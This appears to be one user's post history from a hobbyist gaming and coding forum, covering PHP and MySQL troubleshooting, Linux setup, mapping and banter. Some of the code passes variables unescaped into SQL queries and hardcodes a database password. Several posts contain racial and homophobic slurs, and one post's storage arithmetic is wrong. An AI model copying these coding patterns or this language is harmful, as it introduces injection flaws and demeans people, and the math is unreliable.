I can't even enable a button! :/ javascript code <script type="javascript"> function validateName() { var username= document.register.registerUsername; if (username != "") { document.getElementById("submit").disabled = false; } } </script> html code <div align="center" class="register"><h3>Register</h3> <form action="!register.php" method="post" name="register"> <table width="300px"> <tr> <td>Username:</td> <td><input type="text" name="registerUsername" id="registerUsername" onchange="validateName()" onblur="validateName()" /></td> </tr> <tr> <td>Password:</td> <td><input type="password" name="registerPassword" id="registerPassword" onchange="validatePassword()" onblur="validatePassword()" /></td> </tr> <tr> <td>Repeat Password:</td> <td><input type="password" name="registerPassword2" id="registerPassword2" onchange="validatePassword2()" onblur="validatePassword2()" /></td> </tr> <tr> <td>Email:</td> <td><input type="text" name="registerEmail" id="registerEmail" onchange="validateEmail()" onblur="validateEmail()" /></td> </tr> <tr> <td>Repeat Email:</td> <td><input type="text" name="registerEmail2" id="registerEmail2" onchange="validateEmail2()" onblur="validateEmail2()" /></td> </tr> <tr> <td></td><td><input type="submit" id="submit" value="Register" name="register" disabled="disable"/></td> </tr> </table> </form>
In -_- by sprinkles:
Down Rodeo said: tells the program you want to access the method FindWorlds from $world?
php code <?php require_once 'database.php'; // all we need to do is display, get, or set data class World { public $id; public $name; public $description; public $threads; public $lastPost; public $numberOfCategories; public function __construct($inId=null, $inName=null, $inThread=null, $inLastPost=null) { $this->id = $inId; $this->name = $inName; $this->thread = $inThread; $this->lastPost = $inLastPost; } /* * Determine the amount of worlds */ public function FindWorlds() { //$database = new Database(); //$countRowsConnect = $database->ConnectToDatabase("general"); $countRowsConnect= mysql_connect("127.0.0.1","general","g-g-g-godlike"); mysql_select_db("general"); $countRows = mysql_query("SELECT `id` FROM `world`"); $this->numberOfCategories = mysql_num_rows($countRows); //mysql_free_result($countRows); //mysql_close($countRowsConnect); return $this->numberOfCategories; } /* * Get data from mysql */ public function GetData($worldId) { //connect to mysql //$database = new Database(); //$getDataConnect = $database->ConnectToDatabase("general"); $getDataConnect= mysql_connect("127.0.0.1","general","g-g-g-godlike"); mysql_select_db("general"); $getData = mysql_query("SELECT * FROM `world` WHERE `id`='$worldId'"); $Data = mysql_fetch_assoc($getData); $this->id = $Data['id']; $this->name = $Data['name']; $this->description = $Data['description']; $this->lastPost = $Data['most recent']; //mysql_free_result($getData); //mysql_close($getDataConnect); // Get most recent post information (name, time, etc) $this->lastPost = $this->GetMostRecent($this->id); // Get number of threads $this->threads = $this->GetThreads($this->id); return true; } /* * Set data, does not modify mysql */ public function SetData() { } /* * Sets data, modifies general.world */ public function Update() { } /* * Display data, must call GetData first, otherwise the function will return false */ public function DisplayWorld() { // if we don't make sure we call getdata we cannot display anything! if( empty($this->id) || empty($this->name) || empty($this->description) || empty($this->threads) || empty($this->lastPost) ) { return false; } else { return true; } } private function GetMostRecent($worldId) { $mostRecentQuery = mysql_query("SELECT `most recent` FROM `world` where id=$worldId"); $mostRecent = mysql_fetch_assoc($mostRecentQuery); $mostRecentPost = $mostRecent['most recent']; $mostRecentData = mysql_query("SELECT * FROM region WHERE world=$worldId ORDER BY date DESC"); $final = mysql_fetch_assoc($mostRecentData); return $final['poster'] . "," .$final['date']; } private function GetThreads($worldId) { $threadsQuery = mysql_query("SELECT id FROM region WHERE world=$worldId"); return mysql_num_rows($threadsQuery); } public function __destruct() { // Dark ages? (celestial year 60ish?) } } // end class world // moar code less comments! class Land { } // end class land class Region { } // end class region ?>
In -_- by sprinkles:
My for loop only goes through once. :/ php code <?php $world = new World(); // trunk/core.php $counter = 0; for ($i=0; $i <= $world->FindWorlds; $i++) { $counter++; $world->GetData($counter); // $displayWorld = $world->DisplayWorld(); // if($displayWorld===false) // { // die("if(\$displayWorld===false)");// encountered an error // } // else //{ echo $world->id . "<br />"; echo $world->name . "<br />"; echo $world->description . "<br />"; echo $world->threads . "<br />"; echo $world->lastPost . "<br />"; echo "<be />"; //} ?> php code <?php public function FindWorlds() { //$database = new Database(); //$countRowsConnect = $database->ConnectToDatabase("general"); $countRowsConnect= mysql_connect("127.0.0.1","general","g-g-g-godlike"); mysql_select_db("general"); $countRows = mysql_query("SELECT `id` FROM `world`"); $this->numberOfCategories = mysql_num_rows($countRows); //mysql_free_result($countRows); //mysql_close($countRowsConnect); return $this->numberOfCategories; } ?>
In How i can find brush/brush outside world by sprinkles:
I believe hammer has some kind of 'go to brush #' function somewhere.
In Here we go again by sprinkles:
"There's a post that deserves deletion. I kid, I kid." said Down Rodeo. My dog ate this resurrected truck. So he could re-resurrect this truck. With his bare toes that are
In Here we go again by sprinkles:
"There's a post that deserves deletion. I kid, I kid." said Down Rodeo. My dog ate this resurrected truck. So he could re-resurrect this truck.
In Here we go again by sprinkles:
"There's a post that deserves deletion. I kid, I kid." said Down Rodeo. My dog ate
In how did YOU found superjer.com? by sprinkles:
SRAW said: superjer said: The vent server has been down since the hardware change and relocation to Seattle.
I wasn't even running it. Some Canadian was. Would that canadian just happen to be you? Only French people have goatees.
In HNNNGGG!!!! Error: Portal file by sprinkles:
Warning: More than 8 wadfiles are in use. (9) Warning: No entities exist in hull 0, no filling performed for this hull Warning: No entities exist in hull 1, no filling performed for this hull Warning: No entities exist in hull 2, no filling performed for this hull Warning: No entities exist in hull 3, no filling performed for this hull
In The M-I-N-E-C-R-A-F-T Truck by sprinkles:
Do you guys still play this? Caves fucking suck. Whenever I make one it always fills up with water. ,'(
In GetAsyncKeyState by sprinkles:
The real question is: What is the fastest, most secure, least problematic way to transfer files to a remote host?
In Completely [i]Not[/i] Worth Your Time by sprinkles:
So my friend and I were talking about his 2tb hard drive and int64's. int64 is 64 bits or 8 bytes, and can store a number from -9^18 to 9^18. We were trying to figure out how big of a number a 2tb hard drive can store, roughly. Here's the math that I worked out, I have no clue if its right. 2(tb)x1000=2000(gb)x1000=2000000(mb)x1000=2000000000(bytes) So a 2 terabyte hard drive is 2^9 bytes. Right? Given that 8 bytes can store a number up to 9^18 we divide (2^9)/8 giving us 250000000 8 byte sectors. We then multiply 2.5^8 by 9^18 (2.5^8)(9^18). That gives us 2.2(10^22). So a 2tb hard drive should be able to, roughly, store a number up to 22000000000000000000000. Right?
In GetAsyncKeyState by sprinkles:
You should use sftp instead its 'better.' ibcurl is a free and easy-to-use client-side URL transfer library, supporting FTP, FTPS, HTTP, HTTPS, SCP, SFTP, TFTP, TELNET, DICT, LDAP, LDAPS and FILE. libcurl supports SSL certificates, HTTP POST, HTTP PUT, FTP uploading, HTTP form based upload, proxies, cookies, user+password authentication (Basic, Digest, NTLM, Negotiate, Kerberos4), file transfer resume, http proxy tunneling and more!
libcurl is highly portable, it builds and works identically on numerous platforms, including Solaris, NetBSD, FreeBSD, OpenBSD, Darwin, HPUX, IRIX, AIX, Tru64, Linux, UnixWare, HURD, Windows, Amiga, OS/2, BeOs, Mac OS X, Ultrix, QNX, OpenVMS, RISC OS, Novell NetWare, DOS and more... Chilkat C++ SFTP Library+ code #include <CkSFtp.h>void ChilkatSample(void) { // Important: It is helpful to send the contents of the // sftp.LastErrorText property when requesting support. CkSFtp sftp; // Any string automatically begins a fully-functional 30-day trial. bool success; success = sftp.UnlockComponent("Anything for 30-day trial"); if (success != true) { printf("%s\n",sftp.lastErrorText()); return; } // Set some timeouts, in milliseconds: sftp.put_ConnectTimeoutMs(5000); sftp.put_IdleTimeoutMs(10000); // Connect to the SSH server. // The standard SSH port = 22 // The hostname may be a hostname or IP address. long port; const char * hostname; hostname = "www.my-ssh-server.com"; port = 22; success = sftp.Connect(hostname,port); if (success != true) { printf("%s\n",sftp.lastErrorText()); return; } // Authenticate with the SSH server. Chilkat SFTP supports // both password-based authenication as well as public-key // authentication. This example uses password authenication. success = sftp.AuthenticatePw("myLogin","myPassword"); if (success != true) { printf("%s\n",sftp.lastErrorText()); return; } // After authenticating, the SFTP subsystem must be initialized: success = sftp.InitializeSftp(); if (success != true) { printf("%s\n",sftp.lastErrorText()); return; } // Open a file for writing on the SSH server. // If the file already exists, it is overwritten. // (Specify "createNew" instead of "createTruncate" to // prevent overwriting existing files.) const char * handle; handle = sftp.openFile("hamlet.xml","writeOnly","createTruncate"); if (handle == 0 ) { printf("%s\n",sftp.lastErrorText()); return; } // Upload from the local file to the SSH server. success = sftp.UploadFile(handle,"c:/temp/hamlet.xml"); if (success != true) { printf("%s\n",sftp.lastErrorText()); return; } // Close the file. success = sftp.CloseHandle(handle); if (success != true) { printf("%s\n",sftp.lastErrorText()); return; } printf("Success.\n"); } http://www.chilkatsoft.com/ssh-sftp-c++.asp
In GetAsyncKeyState by sprinkles:
Rockbomb said: But I'd still like to know if there is a good alternative to GetAsyncKeyState, preferably one that'd work on windows/linux/max
Here's a great way to record keys that works with windows/mac/linux/everything else. Setup a video camera behind the computer aimed at the keyboard and have it send the feed wirelessly to the receiver in your van parked outside. Yes, that was on Law and Order (SVU).
In Member Pics by sprinkles:
So my friend brought his gear back from the field and I jus' had to. BTW, the brown blurry thing is the Loch Ness Monster. I keep it in pool under my bed.
In Goldeneye 007 Wii by sprinkles:
Most men are interested in laster longer, but not superjer! He's in then out. Fuck it I know I fucked that sentence up. Get over it.
In The M-I-N-E-C-R-A-F-T railway tutoral! by sprinkles:
Down Rodeo said: I think you keep going until you hit a stack overflow. Must try this when I'm on my laptop.
lulz +rep
In how did YOU found superjer.com? by sprinkles:
aaronjer said: And Jake?!. Seriously. Get on the superjer.com vent server around 4PM-2AM and I'll very likely be on, and then we can play Dota. Not playing Dota is a crime.
Superjer has a vent?
In Goldeneye 007 Wii by sprinkles:
I like how 2 of the gauges in the plane work, and the rest are static. Classic.
In SSH app for Blackberry by sprinkles:
That's right! There is a SSH app for Blackberry. Now I can pretend to be working when I'm not! http://www.xk72.com/midpssh/
In Brother's House Caught on Fire (pics) by sprinkles:
molkman said: So there were only smoke detectors at the floor below the one that caught fire?
There was only 1 floor, the fire started in the attic.
In Brother's House Caught on Fire (pics) by sprinkles:
superjer said: superjer said: superjer said: So were there working smoke detectors in the house? Either way it sounds like got really lucky. I'm going to have to make you a fire-survivor medal or something.
Remember -- next time the power company tries to kill you, just call Sprinkles. He'll save your family and your pets. Yes, there was. The problem was the fire started above the smoke detectors. And, lulz at the second part.
In Brother's House Caught on Fire (pics) by sprinkles:
He's trolling on the internet. Its not something to take seriously no matter what he says. I'm not offended by it in the least, because I know, face to face, he would never say that shit. Jus' like I know he'd never call a gangster a nigger to his face, or laugh at a rape victim. He sees the distance between him and whoever he is trolling as security, which makes him a pussy. The worst thing you can do to a troll is ignore him. He is only interested in your responses, in making you mad or sad. SRAW is the type of person that hurts animals and then laughs about it. SRAW is truly fucked up in the head.
In Ubuntu User Groups by sprinkles:
Rockbomb said: Don't give them the root password.
They enter their password not the roots. To answer my own question, you have to edit the etc/sudouser or whatever.
In Brother's House Caught on Fire (pics) by sprinkles:
It actually was an electrical fire. The power company came out before hand and was trying to solve the power outage problem. In doing so they decided to mess with the breakers inside the house. Apparently they're not allowed to do that. So they're (the reality company) rebuilding the house for free and putting in a second floor. Also, they're suing the power company.
In Brother's House Caught on Fire (pics) by sprinkles:
I told RB I'd get some pics for him, so I did. The Story: My sister-in-law called me up and told me I needed to spend the night at their house, because there was an electrician coming out the next day. Everything was fine that night, and I fell asleep on the couch. I woke up, I can't remember what time, and felt absolutely sick to my stomach. I felt worse than when I had food poisoning at MEPS. So I sat-up and eventually the sickness went away. I woke up sometime later, and jus' felt like there was something wrong. I got up and turned the light on. Then I noticed there was a hole in the ceiling and a little flame beyond it. Next thing I remember is waking up on the floor. I got up and woke my sister-in-law and her daughter up. We made it outside and I sat down in the Wrangler, because I could barely walk. I got a few breathes of air and felt better, so I went back inside to help get the dogs out. I remember a brief moment when my sister-in-law was holding me up and yelling something. We successfully got everybody and all the dogs out. We waited for the fire department to get there, I've no clue how long it took them. They talked to us a little bit, then went and did their jobs. I got put on oxygen in the firetruck. Eventually the ambulance gets there, and I was moved to it and put back on oxygen. I was on oxygen for more than 2 hours. I had a CO level of 23, that is 23% of my blood contained carbon monoxide instead of oxygen. And, during the whole 'escape' sequence I passed out 3 times.
In Zelda Emulator by sprinkles:
I decided to go with the project64 emulator so I can change the controls. I noticed if you don't limit the fps the game plays at hyper-speed!
In Zelda Emulator by sprinkles:
superjer said: OK. So like. When you post a question, and then "nevermind", you're kind of an asshole.
Try posting the answer. This isn't your personal notepad. The whole Internet is going to end up on this page. And guess what. No answers. <3 Emulator: http://www.emulator-zone.com/doc.php/n64/ultrahle.html Orcarina of Time ROM: http://www.emuparadise.org/Nintendo_64_ROMs/Legend_of_Zelda,_The_-_Ocarina_of_Time_(USA)/21618-download
In Pondering... by sprinkles:
I would imagine you would have to do a lot of work to even have access to the firmware. Right?
In Zelda Emulator by sprinkles:
Anyone know where I can get one? I have a huge craving to play the Ocarina of Time, and no Nintendo 64. :/
In Goldeneye 007 Wii by sprinkles:
You can jus' record it from a tradition video camera thingy. Make sure your hands are shaky and its a poor quality camera though, oh and a very dim-lit room, and lots of background noise.
In INTARESTIN DISCUSSHINS by sprinkles:
melloyellow582 said: The fact that is IS a paradox makes it not a paradox. The sentence (if it can define itself, which is another matter entirely) basically states that it is a paradox; however, a paradox is basically something that doesn't make sense. So, logically it is true that if the sentence is not a shrimp (which it is not), it "must" be a paradox. That leads to the problem, because a paradox shouldn't make sense. That means that the sentence is NOT a paradox after all! Still, I am fairly confident that the sentence still is not a shrimp.
Again, it is very silly and doesn't stand have much true intellectual merit, but it is fun. But, couldn't the actual paradox be that the sentence is a paradox? I mean, its a paradox that a paradox makes sense? I'm a worker not a thinker. Whenever somebody has something that needs to be built or whatever, I sit back and let them work out the details. I jus' pick up a hammer and start nailing stuff together. I guess that makes me Mexican?
In Happy Birthday Carl Sagan! by sprinkles:
melloyellow582 said: 1. There is President's Day, but that has (almost) nothing to do with birthdays.
President's Day is a celebration of Washington and Lincoln's birthdays. Congress were jus' douche bags and didn't want to celebrate 2 birthdays, so the made President's Day. Although, I suppose, you are going to find some way to prove me wrong.
In google chrome OS by sprinkles:
Download is taking 4ever (I swear I never spell forever like that). They should torrent it.
In google chrome OS by sprinkles:
Wow, its in the rc stage now. http://getchrome.eu/download I need cds now!
In I need a script about cs 1.6 awp fast switch by sprinkles:
aaronjer said: We go out of our way to derail trucks. Trucks shouldn't even have rails to begin with. That's trains. There's clearly a lot you don't know.
lulz
In Linux (Ubuntu) Problem by sprinkles:
I recently code sudo apt-get dist-upgradeand now I can't ssh my machine or test the web server. ps x says ssh and apache are running, and when I go to localhost the page displays. I checked the ports and 22/80/631/3306 are all open. So what's the problem?
In New PixelMachine by sprinkles:
How does ray tracing work again? It has something to do with shooting rays of light at pictures or something. Broken?
In Happy Birthday Carl Sagan! by sprinkles:
Hey don't get racist. All those presidents are dead and we still celebrate their birthdays. And, also that one guy that tried to convince everyone he was a king.
In Finnish Pedo? Don't ask where i found this. by sprinkles:
Down Rodeo said: If this were deleted, no-one would ever have to know that it existed. And that would be the best thing.
You would know.
In I need a script about cs 1.6 awp fast switch by sprinkles:
SpiKe' said: hey i know how to play!
Did I say you didn't? SpiKe' said: i am very good in awp!
AWP is for pussies. SpiKe' said: but i just want to be faster! is it bad?
Then get better reflexes not a script.
In mysql has a sock problem by sprinkles:
Down Rodeo said: I can virtually guarantee that won't help.
It did...
In mysql has a sock problem by sprinkles:
I can't run mysql, apparently there is no var/run/mysqld/mysqld.sock file. I created a fake mysql.sock file, and it seems something is deleting it.... Any suggestions?
In by sprinkles:
superjer.com said: php code <?php if( $banned && !($areaflags&$AFLAG_BANNED_OK) ) { $_SESSION['msg'] = "You cannot post in this area while banned."; header("Location: {$_SESSION['last_truck_url']}"); return; } ?>
In -censorship- due Nov 30 by sprinkles:
FallingShit said: Censor this mofos!
**BAD IMAGE** You meant:
?
In Rock's cpp truck. by sprinkles:
Down Rodeo said: Firstly I'd drop the quote mark from the path.
Right. Down Rodeo said: MSVS
See my previous post please.
In Rock's cpp truck. by sprinkles:
Chrome has an extension for pastbin.com. Anyways, when I try to compile this in dev-c++ I get this error: code C:\Users\Mike\Documents\RB's thing\Makefile.win [Build Error] No rule to make target `C:/Program', needed by `main.o'. Stop.
In need cstrike czero tspecialists *.fgd by sprinkles:
I have condition zero but I can't find any fgds...
In Dynamic Background with PHP and CSS by sprinkles:
No, switch is basically a bunch of if statements. I jus' noticed something: code background: url(<?php echo "$background"; ?>) no-repeat fixed center top;The echo "$background"; may jus be echoing background, and not the value. My web server is down right now so I can't test out this theory. I know print "$background"; would output the value of background, but I'm not sure about echo.
In Dynamic Background with PHP and CSS by sprinkles:
I tried something similar to that, but it doesn't any background... php code <?php $backgroundNum = rand(0,10); switch ($backgroundNum) { case 0: { $background = "backgrounds/warlone.jpg"; break; } case 1: { $background = "backgrounds/cs.jpg"; break; } case 2: { $background = "backgrounds/ak.jpg"; break; } case 3: { $background = "backgrounds/art.jpg"; break; } case 4: { $background = "backgrounds/csjump.jpg"; break; } case 5: { $background = "backgrounds/guyDestruction.jpg"; break; } case 6: { $background = "backgrounds/guyFire.jpg"; break; } case 7: { $background = "backgrounds/hl2Gordon.jpg"; break; } case 8: { $background = "backgrounds/hl2Guard.jpg"; break; } case 9: { $background = "backgrounds/timeSquare.jpg"; break; } case 10: { $background = "backgrounds/warRight.jpg"; break; } } ?> <html> <head> <style type="text/css"> #bg { background: url(<?php echo "$background"; ?>) no-repeat fixed center top; width: 100%; display: table; } </style> </head> </html>
In Cheer up Rockbomb by sprinkles:
Everybody, rb is mad. Mad like this: My contributinationing: http://www.superjer.com/sprinkles/meps.html
In Dynamic Background with PHP and CSS by sprinkles:
So you know those retarded pages where the background is static and everything else moves over it? Well I'm making one of those. My problem is I want the background to change every so often (refresh, hour, day, whatever). How would I do this?
In Tutorials by sprinkles:
See that's not how I roll. If somebody wants to borrow/use something of mine I have no problem. I'm a pretty open guy. Not much in this world bothers me. But, lets jus' curtail this, its obvious we are not seeing eye to eye so there is no point in going on. The fact is we gotsa be gettin' to ritin' those tuts so those peeps can teach.
In Tutorials by sprinkles:
Rockbomb said: I don't know anyone else who would give out access like that, and I personally wouldn't trust anyone but me and two or three other people that I've known most of my life to have access on there.
I don't want to start anything here, but if I had my own server 90% of the people that asked for upload access would get it.
In Possibly Intarestin Discusshins by sprinkles:
Personally I think black holes are fascinating. How can something be so dense light can't even escape its gravitational pull!?
In Tutorials by sprinkles:
Rockbomb made his own foras: Rockbomb said: 1.) This is a place to teach and to learn, a place to discover, and a place to share ideas.
But, he wants to limit how and where you can make tuts, also he wants to be a fag and deny me upload access. So I think superjer should have a tutorial section on his foras.
In Vertex manipulation by sprinkles:
BlackholeHM said: the shapes I am trying to create being clearly possible.
In real life yes, in games no. Most game engines don't know how to 'work' with concave objects. All your brushes (in Goldsource at least) must be convex.
In Simple PHP Script by sprinkles:
Alright on my foras there seems to be a problem with the session table in the forum's database. I wrote this script to manually empty the sessions table. Tell me where I can improve if you would. All the sensitive information has been stared out, you know kids these days. Its pretty self-explanatory, but I will tell you the basic flow of the program. Admin arrives at index.php, they login if login is successful they go to login.php they then have a hyperlink to admin.php at admin.php they can clear the session table also on admin.php they have a hyperlink to logout.php logout.php logs you out and takes you to index.php http://superjer.com/sprinkles/index.txt http://superjer.com/sprinkles/login.txt http://superjer.com/sprinkles/admin.txt http://superjer.com/sprinkles/logout.txt
In Sucks to be him.. by sprinkles:
Mate de Vita said: sprinkles said: Ahhh, that one is going in the collection....
http://www.superjer.com/forum/funny_pictures.php 404 Not FoundSuperJer Forum Server v.53k-217s. Havoc has access!!!! HINT
In Sucks to be him.. by sprinkles:
Ahhh, that one is going in the collection.... http://www.superjer.com/forum/funny_pictures.php
In Sucks to be him.. by sprinkles:
Outcast said: idk but i've never seen an elevator door getting smashed like that lol
That makes me want to put a brush guard on a auto-dravable-wellchar and smash shit with it. Liek try ta rob conveient stor with it ya fell nigga?
In getch(), ungetch(c), and EOF by sprinkles:
Mate de Vita said: It's a part of a Reverse Polish Notation Calculator.
That's right, those Polishess's people always think they're smart. Inventing fancy computin' machines. wtf!?!?! Quote's fucked up.... :S
In WhiteBird by sprinkles:
Down Rodeo said: When you say new features, are these features it has or will have?
Will have. http://www.speedyshare.com/files/24871763/WhiteBird.exe First release!
In Made a New Movie by sprinkles:
SRAW said: Whoa your channel is so dark and uncool
TEH GRAETEST YOUTUEB CHENNEL OF ALL TMIE http://www.youtube.com/user/iansayfol And, yours is all pink and girly. Nice job, faggot.
In INTARESTIN DISCUSSHINS by sprinkles:
Rockbomb said: I love how Sprinkles just jumped in and rephrased the post directly before him in attempts to fit in to the conversation
I don't like this new kid. Douche bag.
In INTARESTIN DISCUSSHINS by sprinkles:
Didn't he say that the black holes were sucking up information?
In Custom Rig by sprinkles:
Rockbomb said: sprinkles said: Rockbomb said: SRAW said: I'm liek, wtf is up with you fucking rich_dick_heads.
Well I joined the military, so all the citizens that can't afford to buy a rig like this (probably because of so much taxes) will be paying for this rig No you're wrong. You joined the Air Force. The Air Force is not part of the US military, its part of We are Fags That Pilot Planes Community; found here. You're just mad cuz I'll be flyin' around in a fuckin fighter jet while you're standing on the ground runnin around in a tutu like "mommy! I made peepee in my pants! QQ". And I'll see you on the ground and be like "OH SHIT GUYS PULL THE JET OVER, THERE'S A STRANDED AMERICAN BABY ON THE GROUND!", and then we'll park that bitch and go to pick you up. But then we'll realize that you're not a real baby and just be like "LOL ITS JUST SPRINKLES! LOLOLOLOLOL... lets go guys." And we'll hop back and drive that shit around the sky lookin' for some bitches to pick up. hahaha considering you don't have the balls to talk to the girl at the movie theater...
In Custom Rig by sprinkles:
Rockbomb said: SRAW said: I'm liek, wtf is up with you fucking rich_dick_heads.
Well I joined the military, so all the citizens that can't afford to buy a rig like this (probably because of so much taxes) will be paying for this rig No you're wrong. You joined the Air Force. The Air Force is not part of the US military, its part of We are Fags That Pilot Planes Community; found here.
In Custom Rig by sprinkles:
My rig- Tower: http://www.newegg.com/Product/Product.aspx?Item=N82E16811119225 Motherboard: http://www.newegg.com/Product/Product.aspx?Item=N82E16813131398 Processor: http://www.newegg.com/Product/Product.aspx?Item=N82E16819103894 Sound Card: http://us.store.creative.com/PCI-Express-Sound-Blaster-XFi-Titanium/M/B001E25KDK.htm Monitor: http://www.newegg.com/Product/Product.aspx?Item=N82E16824236050R Graphics Card: http://www.newegg.com/Product/Product.aspx?Item=N82E16814102878
In Interesting bug with the 'new/unread posts' feature by sprinkles:
Down Rodeo said: Kind of, but sometimes the forums demand a refresh.
Doesn't that answer your question?
In Interesting bug with the 'new/unread posts' feature by sprinkles:
Down Rodeo said: I'm not sure I understand why only sometimes, if you use the back functionality, the yellow boxen remain.
Doesn't that jus' use your cache?
In Interesting bug with the 'new/unread posts' feature by sprinkles:
superjer said: (I actually didn't know any of this until I just now dug around in my $_SESSION. I wrote all this code many years ago.)
Where is this? Rather what's the name of the php?
In http://77.78.239.64 by sprinkles:
Rockbomb said: Also does anyone know where SRAW lives? The IP traces to somewhere in Moldova. If he lives in Moldova banning is imminent
That time we played CS for that beta party (great wording by the way) it said he came from someplace that started with an 'm.' Nonetheless, the admins can see SRAW's ip anyways....
In Visual Bugs by sprinkles:
beggi90 said: And one classic I think I got the solution for but not sure if it's the best one. So how would you guys tackle problem like this?
![]() I take it there is a sky box beyond the fence?
In Cant click items on 3D view. by sprinkles:
These fora are dedicated to the awesomeness that is superjer.
In Cant click items on 3D view. by sprinkles:
I think you should consider not mapping for a game that's almost 15 years old. :/
In Scan Into a Document by sprinkles:
After some Googling, I found that there are OCR programs. So does anybody know a good OCR?
In Scan Into a Document by sprinkles:
So I don't scan documents much. But, every now and again my mom has me scan something for her. The problem is she needs it in a .doc .txt .rtx or something she can write in. As you know they usually scan into a picture. So how do I change this? Is there a setting on the printer or do I need to download third party software?
In Decoding website? HTML? by sprinkles:
I'll do it, as well as get rid of the ads. What do you want the title to be? And what is this page about (for the description/content)? All the important stuff is embedded in the swf. It would be easier to make a new flash object. Would you like me to do that instead?
In Decoding website? HTML? by sprinkles:
Rockbomb said: sprinkles said: @RB, all the links are direct, example:
http://superjer.com/sprinkles/test.html @theotherguy, I'll fix the ads when I'm done watching Iron Man 2. Yes, but the files are still on another site. It might work, but you shouldn't rely on another site to host files for yours. Essentially, if the other site crashes, so would his. And its usually frowned upon leeching files from anywhere. Well, considering he has a free website builder make him a site, then he wants to get their ads off it, I doubt he cares about leaching. Nonetheless, copy pasta: http://static.wix.com/client/css/viewer.css http://static.wix.com/client/js/swfobject.js http://static.wix.com/client/js/basichtml.js http://static.wix.com/client/js/userApi.js And, whatever resources are left.
In Decoding website? HTML? by sprinkles:
@RB, all the links are direct, example: http://superjer.com/sprinkles/test.html @theotherguy, I'll fix the ads when I'm done watching Iron Man 2.
In PHP Errors by sprinkles:
php code <?php function stringPurge($sValue, $sAllowedEntities[], $sAllowedSpecialChars[], $iLength=0) ?> Dreamweaver tells me there is a syntax error...
In No Face by sprinkles:
Rockbomb said: I would say that Sprinkles used hacks to find them, but I'dprobably get banned.
I hope you do get banned. You're blowing this out of proportion, nobody gives a fuck about you making hacks. NatureJay said: Rockbomb said: I would say that Sprinkles used hacks to find them, but I'dprobably get banned.
You would get banned for being a bad influence on poor, innocent sprinkles.
In INTARESTIN DISCUSSHINS by sprinkles:
Down Rodeo said: Finally this is all thought-experiment, so we're assuming that the doors work properly for our purposes and that. I'm a physicist, not a masochist.
No, but assuming you intended us to endure your big walls o' text could make you a sadist.
In MySQL Error by sprinkles:
Superjer, you must have gone to "Learn everything about everything" college. BTW: php code <?php require_once 'protect.php'; ?> php code <?php if (isset($_POST['submit'])) { $shout = protect($_POST['shout']); ?> php code <?php function protect($sValue) { $sValue = mysql_real_escape_string($sValue); $sValue = htmlentities($sValue, ENT_QUOTES); $sValue = trim($sValue); return $sValue; } ?> Now that I look at it mysql_real_escape_string and htmlentities together kind of mess things up. php code <?php $sValue = "Hello, e'erybody"; $sValue = mysql_real_escape_string($sValue); ?> $sValue now equals "Hello, e\'erbody"; php code <?php $sValue = htmlentities($sValue, ENT_QOUTES); ?> $sValue now equals "Hello, e\'erbody" Right? Haha, it converted the HTML representation of ' to '. But you get what I mean right?
In MySQL Error by sprinkles:
It seems it didn't like the $_SESSION['uid'] and NOW(). I subsituted them for variables. And now its telling me: code Warning: mysql_query() [http://www.mysql.com/doc]: Unknown column 'fdafda' in 'field list' in /var/www/shoutbox.php on line 52line 49-52 code 49 mysql_query("INSERT INTO `shouts` SET50 `_userid` = $id, 51 `_date` = $now, 52 `_message` = $shout ");
In MySQL Error by sprinkles:
I don't even know where to begin.... Warning: mysql_query() [http://www.mysql.com/doc]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''shouts' SET 'userid' = 2, 'date' = NOW(), 'message' = 'hjkl'' at line 1 in /var/www/shoutbox.php on line 50 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''shouts' SET 'userid' = 2, 'date' = NOW(), 'message' = 'hjkl'' at line 1 php code <?php else { mysql_query("INSERT INTO 'shouts' SET 'userid' = {$_SESSION['uid']}, 'date' = NOW(), 'message' = '$shout' ") or die(mysql_error()); } ?>
In Install php by sprinkles:
php code <?php function escape_string($string) { if ($this->functions['escape_string'] == $this->functions['real_escape_string']) { return $this->functions['escape_string']($string, $this->connection_master); } else { return $this->functions['escape_string']($string); } } ?> What does this code do? I was getting errors so I changed: php code <?php return $this->functions['escape_string']($string); ?> to php code <?php return $this->functions['real_escape_string']($string); ?>
In Install php by sprinkles:
New problem... mysql doesn't like php... Its telling me I have to enable mysql functions in php or I have to enable php functions in mysql... code vBulletin 4.0.7 requires that the MySQL functions in PHP be available. Please ask your host to enable this.
In Install php by sprinkles:
Can you/somebody tell me how to make it so that php files are shown instead of downloaded? httpd.conf code AddType application/x-httpd-php .phpAddType application/x-httpd-php-source .phps Weird thing though, bash said that httpd wasn't a recognized service...
In Install php by sprinkles:
So I decided to setup a simple web server so I can test out some php scripts. I did: bash code apt-get install php-pearbash code apt-get install php5-devBut, the php files still download instead of display.
In Voting by sprinkles:
Sorry I was AFK. I added the trim($line) == $_SERVER['REMOTE_ADDR'] and it seems to work!? Haven't tested it out much, or looked at any files/resources. So idk right now. I'll let you know later. So I have tested it out and it works. Now to jus' clean it up a bit. And how do you supposed I make it concurrency safe?
In Voting by sprinkles:
Entire file: php code <?php $pollQuestion = ''; $answers = ''; function readData(){ global $pollQuestion,$answers; // Read configuration $rawdata = file('Data/Poll/polldata.txt'); // Get the question for polling $pollQuestion = $rawdata[0]; // Get number of answers - The foirs row is the question $numberOfAnswers = sizeof($rawdata)-1; $count = 0; for ($i=1; $i <= $numberOfAnswers; $i++){ $answerData = explode(':',$rawdata[$i]); // If tha actual row is not empty than add to the answers array if (strlen(trim($answerData[0]))>0){ $answers[$count]['text'] = $answerData[0]; $answers[$count]['count'] = $answerData[1]; ++$count; } } } function writeData(){ global $pollQuestion,$answers; $file = fopen('Data/Poll/polldata.txt','w'); fwrite($file,$pollQuestion."\r\n",strlen($pollQuestion)); foreach ($answers as $value) { $row = $value['text'].':'.$value['count']."\r\n"; fwrite($file,$row,strlen($row)); } fclose($file); $file2 = fopen('Data/Poll/blacklist.txt','a'); $ip = $_SERVER['REMOTE_ADDR']; fwrite($file2,$ip."\n"); fclose($file2); } readData(); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html> <head> <link href="Data/Poll/style/style.css" rel="stylesheet" type="text/css" /> <title>Bamf.^ Video of the Day</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-18602024-1']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; 